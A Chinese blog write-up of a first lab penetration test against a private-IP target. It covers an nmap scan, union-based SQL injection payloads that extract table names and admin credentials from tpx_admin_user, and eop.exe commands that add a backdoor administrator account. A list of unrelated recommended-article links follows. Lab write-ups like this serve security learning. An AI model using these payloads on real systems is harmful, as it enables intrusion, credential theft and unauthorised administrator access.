记第一次实战靶场的经验
nmap -sS -n -A -T4 -p- 192.168.182.183
-sS 指定某个协议
-n 防止反解析
-A 探测目标主机的版本及操作系统
-T4 快速扫描
-p- 指定IP,对所有端口进行探测
http://192.168.182.183/index.php?s=/news/6) and 1=1-- -
http://192.168.182.183/index.php?s=/news/6) and 1=2-- -
http://192.168.182.183/index.php?s=/news/6) order by 7-- - (该数据库有7个字段)
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,7-- -
(4)猜解数据库名
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,database()-- -
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='tpx_admin_user'-- -
http://192.168.182.183/index.php?s=/news/-6) union select 1,2,3,4,5,6,group_concat(username,0x7e,password) from tpx_admin_user-- -
eop.exe "net user mark mark123+++ /add"
eop.exe "net localgroup adminisrators mark /add"
注:实战中的情况千变万化,我们需要不断地尝试去寻找突破,虽然过程有些许的复杂,但是成功之后也会获得慢慢的成就感。若其中有不对的地方,希望大佬们能够提一些建议。
记第一次实战靶场的经验相关推荐
- 记第一次C++面试与经验分享
**记第一次C++面试与经验分享 #记第一次C++面试与经验分享# ** 这篇文章写于本人大三下学期. 本人菜鸟一枚,所学专业是电子科学与技术(集成电路方面),但由于感觉本专业历届学长学姐从事本行业人 ...
- 记第一次出差得出的经验
文章目录 1:背景 2:过程 3:心得 1:背景 由于上家公司的某种原因,离职来到了新公司,内中原因不足道也.新公司业务方向暂且不说,入职后,个人看着以前的产品视频学习了不到两周,被带教老大告知有新项 ...
- CIO实战方法与经验分享(转自赛迪网)
吴文钊赛迪网在线访谈实录 聊天主题: CIO实战方法与经验分享 [系统公告]: 吴文钊进入了聊天室 [系统公告]: 程鸿进入了聊天室 [系统公告]: 网友进入了聊天室 程鸿: 各位网友大家好! 程鸿: ...
- 暗月渗透实战靶场-项目六(上)
暗月渗透实战靶场-项目六 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集 我们已经知道目标 ...
- 记第一次使用CDSN进行学习记录
记第一次使用CDSN进行学习记录 先立个flag: 目标使用R进行数据可视化及简单数据分析.熟练使用SAS进行数据管理,分析. 再立flag: 尽量每周五更新 以下markdown小技巧保留,方便查看 ...
- 全!CTF靶场、渗透实战靶场总结 (适合收藏)
CTF靶场.渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门.提升自己.丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯): 渗透实战靶场: ...
- VulnHub渗透测试实战靶场 - Odin:1
VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...
- 记第一次使用tiptap踩的坑
记第一次使用tiptap踩的坑 引入tiptap之后直接报错Duplicate use of selection JSON ID cell 局部引用报错 样式问题 引入tiptap之后直接报错Dupl ...
- VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1
VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...
- VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...
最新文章
- 机器学习项目失败的9个原因
- 各类最新Asp .Net Core 项目和示例源码
- 表达式如何获取复选框的值_Nuke表达式 Expression节点讲解
- 表格列隐藏_【excel每日提升】Excel隐藏列,不让别人打开!
- ruby 将字符转数字计算_Ruby程序计算一个数字中的位数
- VS Code常用快捷键汇总
- 华山论“件”:Kafka、RabbitMQ、RocketMQ技能大比拼
- js点击按钮改变字体大小并给他颜色_如何在Elementor中修改文本的字体、大小、颜色、样式...
- win10 php7安装,win10 安装 php7.3+apache2.4-Go语言中文社区
- 数据结构笔记(八)-- 链式栈
- 阅读文献整理20220104
- 这应该是把计算机网络五层模型讲的最好是文章了,看不懂你打我
- idea安装插件方式及个人使用插件
- iOS App 签名的原理 App 重签名(一)
- ds18b20程序c语言,单片机中使用DS18B20温度传感器C语言程序(参考6)
- Android关闭输入法
- S.M.A.R.T 参数详解及推荐指标
- 从职校到前端培训班经历(一)
- c语言课程设计猜数字游戏报告,C语言课程设计-猜数字游戏报告.doc
- Facebook的秘密,如何靠正确的增长指标杀出重围?
热门文章
- 找工作神器,提取各大网站有效的招聘信息(前程无忧、智联招聘、猎聘网)...
- NISP网络信息安全面试怎么选择(六)NISP管理中心
- C++文件服务器项目—FastCGI—4
- thinkpad笔记本电脑更换固态硬盘
- CAN总线(一)——CAN总线是什么,在哪用,怎么用?
- python最长的单词判断_Python 找出英文单词列表(list)中最长单词链
- 如何简单通俗地解释什么是云计算?
- Screeps入门: harvest,upgrader,builder初级自动化
- “应用程序无响应”原因汇总
- 【预定义】C语言预定义代码(宏、条件编译等)内容介绍【最全的保姆级别教程】